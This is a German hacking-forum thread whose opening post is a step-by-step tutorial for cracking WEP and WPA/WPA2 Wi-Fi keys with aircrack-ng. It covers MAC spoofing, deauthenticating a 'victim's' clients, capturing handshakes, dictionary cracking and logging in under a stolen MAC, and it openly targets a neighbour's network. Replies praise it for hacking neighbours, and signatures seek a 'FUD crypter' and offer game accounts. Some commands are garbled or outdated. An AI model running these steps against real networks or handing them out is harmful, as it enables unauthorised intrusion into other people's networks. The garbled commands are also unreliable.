Seite 1 von 3 123 LetzteLetzte
Ergebnis 1 bis 10 von 23
  1. #1

    Standard WLAN WEP/WPA/WPA2 Allround Hacking

    WLAN Allround Hacking
    WEP WPA und WPA 2 Hacking
    by F0rmSkull 2008


    So hallo und schön dass ihr mein Tutorial lest ; )
    Da ich mich in letzter Zeit wieder intensiver mit meinem Notebook und dem Netz von meinem
    Nachbarn beschäftigt habe :-P kam mir die Idee einfach mal ein „Wlan Allround Tutorial“ zu
    schreiben. Hier werde ich Wlan Grundlagen nur kurz ansprechen, da dieses Tutorial eher
    praxisorientiert ist. In diesem Text arbeite ich mit BackTrack V3
    (http://www.remote-exploit.org/backtrack_download.html)
    Manche Tools gibt’s natürlich auch für Windows. Einfach mal googlen ; )




    I) WLAN Einführung

    I.1) Was ist WLAN und wie funktioniert es?
    I.2) WEP/WPA: Erklärung und Unterschiede
    I.3) Begriffs- und Abkürzungserklärung


    II) Vorbereitung
    II.1) Device finden
    II.2) MAC fälschen
    II.3) Promiscuous Mode
    II.4) Opfer finden


    III) Hack that WEP

    III.1) Opfer abhören
    III.2) Traffic erzeugen
    III.3) Key cracken


    IV) Hack that WPA/WPA2

    IV.1) Opfer abhören
    IV.2) Handshake
    IV.3) Key cracken


    V) Abschluss

    V.1) MAC anpassen und einloggen ;-)
    V.2) Schlusswort




    I) WLAN Einführung
    I.1) Was ist WLAN und wie funktioniert es?
    WLAN ist die Abkürzung für Wireless local area network (Kabelloses lokales Netzwerk).
    Dies ist eine Funkverbindung für verschieden Geräte, meist aber PCs.
    WLAN hat 2 „Arten“: Den „Infrastructure Mode“ und den „Ad-hoc Mode“.
    Im Infrastructure Mode gibt es 1 AccessPoint. Also einen Mittel- oder Schnittpunkt der das
    Netzwerk und die Pakete verwaltet. Von dieser Station werden mehrmals pro Sekunfe kleine
    Datenpakete (Beacons) gesendet. In diesen Paketen stehen die für die Clienten wichtigen
    Informationen wie SSID, Frequenzen und Verschlüsselung.
    Der Ad-hoc Mode wird verwendet um schnell wenige Geräte miteinander zu verbinden. Dabei gibt
    es keinen „richtigen Mittelpunkt“. Da dadurch keine Beacons gesendet werden weiß der Client
    nicht wann er sich in Reichweite befindet und wann nicht. Im Ad-hoc Modus werden aber trotzdem
    SSID und Verschlüsselung benutzt ; ). Noch schnell zu den Frequenzen:
    Also der wohl momentan meist genutzte Standard ist der IEEE 802.11a mit maximal 54Mbps.
    In Europa, USA und Japan sind Frequenzen von 2,412 bis 2,442 GHz erlaubt. Das sind 7 Channel.
    Also wer noch genaueres wissen will fragt Google ;-)
    Weiter geht’s...


    I.2) WEP/WPA: Erklärung und Unterschiede
    WEP (Wired Equivalent Privacy) ist eine bereits „veraltete“ Verschlüsselung. Als WEP neu auf
    den Markt kam sah man es alt extrem sicher, was es aber nicht ist, wie sich schnell herrausstellte.
    Um WEP zu hacken muss man nur genug Pakete sammeln und kann daraus dann den Key
    berechnen. Aber dazu unten mehr ; ). Ein WEP Paket besteht aus den zu sendenden Informationen
    und einer 32Bit Prüfsumme der Nutzerdaten. Das wird alles verschlüsselt und ein 24Bit langer Teil
    des WEP Keys (IV, Initialisierungsvektor) angehängt. Mit dem IV und dem Key auf dem Client
    kann der Empfänger dann wieder den Text der Nachricht entschlüsseln.
    WPA basiert auch auf dieser Technis, nur das bei WPA noch ein „temporärer Schlüssel“ angehängt
    wird und der IV nicht nur 48 bit langen Key sondern noch weitere Funktionen wie „Per Packet Key
    Mixing“ zur sicherung. WPA2 unterstütz dann noch den AES Verschlüsselungsalgorithmus.

    I.3) Begriffs- und Abkürzungserklärung
    In diesem Tutorial werde ich ein paar Abkürzungen benutzen, die ich euch hier erkläre.
    Allerdings benutze nicht nur ich diese Abkürzungen sondern auch vieeeeele andre ; ).
    Also:
    AP = Accesspoint (s.o./Meist WLAn Router)
    CL = Client (Der PC der im WLAN eingeloggt ist)
    BT = BackTrack (Linux WLAN-Hacking Distri. Auch als Live CD erhältlich)
    IFC = Interface (Device, also der „Name“ eurer WLAN Karte)
    MAC = MAC Adresse (Die Andresse deiner Netzwerkkarte)




    II) Vorbereitung
    II.1) Device finden
    So, schön dass ihr noch da seit :-P. Jetzt wird’s spannender. Aber als erstes müssen wir ein paar
    Informationen von unserem PC verlangen. Wichtig ist die IFC (s.o.).
    Dazu starten wir unter BT eine Shell und geben dort:
    iwconfig
    ein. Bei mir eth0.


    II.2) MAC fälschen
    Damit wir keine Folgen des Hacks zu spüren bekommen sollten wir die einmalige MAC fälschen.
    ifconfig IFC hw ether 00:12:34:56:78:90


    II.3) Promiscuous Mode
    Noch ist unsere WLAN Karte unbrauchbar. Aber mit dem „Promiscuous Mode“ wird unsere Karte
    ALLE WLAN Pakete empfangen können.
    airmon-ng start wifi0
    wlanconfig eth0 destroy
    ifconfig eth1 up
    iwconfig eth1 mode Monitor channel 0
    Statt eth natürlich euren IFC einsetzten ; )


    II.4) Opfer finden
    So, nun zum entspannteren Teil^^ Jetzt müssen wir uns noch ein Opfer aussuchen.
    Welche zu Verfügung stehen sehen wir mit airodump-ng.
    airodump-ng –w WlanTestHack IFC
    Merkt euch dann die BSSID und die MAC vom AccessPoint.




    III) Hack that WEP
    III.1) Opfer abhören
    So nun warten wir bis wir ca. 600 000 Pakete haben.
    Spaaaaaaaaaaaaaß^^. Natürlich warten wir uns da nicht dumm und dämlich.
    Wir beschleunigen das ein bisschen ; ). Wenn ihr aber ABSOLUT unauffällig bleiben wollt solltet
    ihr lieber Monate warten.


    III.2) Traffic erzeugen
    Wir erzeugen/erzwingen Pakete, und dazu noch sehr informative : ).
    Wie? Na wir disconnecten einen der User, und der muss sich dann wieder anmelden.
    Dabei hört ein Traffic Generator den sogenannten ARP Request ab, und sendet diesen laufend an
    den AP. Der Hacken an der Sache ist nur das der AP nur Bestimmte MACs zulässt, wenn ein MAC
    Filter eingeschaltet ist. Aber so ein Problem ist das nun auch wieder nicht, vor allem nicht unter
    Linux :-P.
    MAC von Client übernehmen: aireplay-ng -3 –b AP_MAC –h CL_MAC –x 600 IFC
    APR Request erzwingen: aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC


    III.3) Key cracken
    So nach ein bisschen warten haben wir auch genug Pakete (min 400k, gut 600k) um endgültig den
    WEP Schlüssel zu berechnen.Dabei bitte bedenken um so mehr Ivs/Pakete ihr habt desto schneller
    geht das cracken. Bei 600 000 sind es ca 15 min, bei 400 000 9 Stunden.
    aircrack-ng –x -0 WlanTestHack




    IV) Hack that WPA/WPA2
    IV.1) Opfer abhören
    Ähnlich wie bei WEP müssen wir erst Pakete sammeln. Dabei aber einen anderen Befehl
    verwenden, da wir die Pakete nicht als .IVS speicher dürfen.
    airodump-ng –w WlanTestHack –c Channel --bssid AP_MAC IFC


    IV.2) Handshake
    Nun kommt wieder etwas WEP ähnliches^^. Wir müssen einen Clienten disconnecten bzw. nicht
    mal das, wir müssen nur den Login-Vorgang eines Clienten in das Netzwerk sniffen. Aber bevor
    wir da wieder Stunden warten helfen wir da ein wenig nach ; ).
    aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC


    IV.3) Key cracken
    Der „Nachteil“ an WPA ist das man den Key (noch) nicht errechen, sondern nur Brute Forcen
    kann. Also holen wir uns ein sehhhhhhhhhhhr großen Dictionary und vergleichen Key mit Wort....
    aircrack-ng -0 –x2 -w Woerterliste.txt WlanTestHack.cap


    V) Abschluss
    V.1) MAC anpassen und einloggen
    Wenn kein MAC Filter vorhanden ist, muss man es nicht tun, allerdings zur Sicherheit und
    Anonymität würde ich es immer machen.
    ifconfig IFC down hw ether CL_MAC
    Jetzt müssen wir uns nurnoch einloggen. Entweder mit dem Grafischen Tool:
    wlassistant
    oder mit der Shell:
    iwconfig IFC essid AP_NAME_SSID mode Managed
    key s:KEY_ASCII
    ifconfig IFC up
    iwpriv IFC authmode 2
    dhcpcd IFC


    V.2) Schlusswort
    So, nun bin ich auch schon am Ende meines Tutorials, ich hoffe natürlich dass es euch gefallen hat
    und vorallem etwas gebracht ; ). Über einen Besuch auf meiner Seite würde ich mich auch freuen.




    MfG euer F0rmSkull
    http://www.project-dragon.de.ms
    Tutorial © 2008 by F0rmSkull


    Downloadquellen:
    BackTrack: http://www.remote-exploit.org/backtrack_download.html



    Feed back bitte ; )
    HF, MfG F0rmSkull
    Die Intelligenz sitzt nicht im Computer. Sie sitzt vor der Tastatur.
    [B] PHP/MySQL, C++, ASM und VB Support
    [S] RS Accs, Steam Accs

  2. #2
    W32.FunLove
    Registriert seit
    18.12.2007
    Beiträge
    153

    Standard

    fein gemacht... und schön erklärt!!!
    ich liebe bt3!!
    weiter so
    achja, schöne page
    -------

    i am a fat stupid idiot...
    that will never change

    [ICH SUCHE] -- FUD crypter

    mich bitte per pm anschreiben

  3. #3
    Fortgeschrittener
    Registriert seit
    19.01.2008
    Beiträge
    42

    Standard

    schön gemacht =)

    gefällt mir gut

    nur mit meinem fritzwlan stick komm ich da nicht weit^^ oder doch?

  4. #4

    Standard

    Freut mich sehr das es euch so gefällt ;-) xD

    nur mit meinem fritzwlan stick komm ich da nicht weit^^ oder doch?
    Mit den USB Sticks ist das nun immer so eine Sache, gell^^
    Ich befürchte du kannst nicht sehr viel damit machen. 1) ist es ein Stick -> eventuelle Treiber und erkennungsprobleme und außerdem wenn es dann acuhnoch extra ein Fritz Stick ist, nehme ich an das er nur mit FritzBoxen kompatibel ist. Um ehrlich zu sein hab ich es mit einem Stick noch nie Probiert^^ Hab Wlan Adapter im Notebook^^^^

    PS.: Die HP wird noch besser und voller ;-) Thx

    MfG
    Die Intelligenz sitzt nicht im Computer. Sie sitzt vor der Tastatur.
    [B] PHP/MySQL, C++, ASM und VB Support
    [S] RS Accs, Steam Accs

  5. #5
    W32.FunLove
    Registriert seit
    18.12.2007
    Beiträge
    153

    Standard

    fritz wlan stick?
    der hat doch nur windows treiber drauf!! (hab ich auch )
    den kannst du unter backtrack vergessen, erst mal ergibt sich das treiber problem ( windows -- linux ) und wenn du wirklich schaffst das teil irgendwie zu "mounten" (tut mir leid mir fällt gerade keine anderer begriff ein) wirst du probleme mit der reichweite bekommen
    -------

    i am a fat stupid idiot...
    that will never change

    [ICH SUCHE] -- FUD crypter

    mich bitte per pm anschreiben

  6. #6
    Fortgeschrittener
    Registriert seit
    19.01.2008
    Beiträge
    42

    Standard

    der fritz wlan stick geht für alle router

    es gibt auch nen linux treiber

    nur soweit ich weiß hab ich damals bei ++++++++++ gelesen das er nicht geht bin mir aber nicht mehr so sicher ist schon über 1 jahr her als ich das gelesen habe

  7. #7
    W32.FunLove
    Registriert seit
    18.12.2007
    Beiträge
    153

    Standard

    hast recht:

    http://webgw.avm.de/download/Download.jsp?partid=12591

    sollt ich auch mal wieder meinen stick rausholen..
    wird aber wahrscheinlich nicht so einfach sein mit dem "schnell mal ne runde wlan cracken"
    -------

    i am a fat stupid idiot...
    that will never change

    [ICH SUCHE] -- FUD crypter

    mich bitte per pm anschreiben

  8. #8
    Fortgeschrittener
    Registriert seit
    18.08.2007
    Beiträge
    43

    Standard

    nice nice weiter so echt sehr aufschlussreich.

  9. #9
    Trojaner
    Registriert seit
    12.02.2008
    Beiträge
    51

    Standard

    ja das ist ein richtig geiles tut

    haste gut gemacht gut zu gebrauchen um nachbarn zu hacken

  10. #10
    Gesperrt
    Registriert seit
    13.12.2007
    Beiträge
    57

    Standard

    Also ausgenommen dass ich nicht weiß was eine "shell" ist, muss ich beim start von BT3 ein benutzernamen und passwort eingeben. Wie lautet es denn?

Seite 1 von 3 123 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •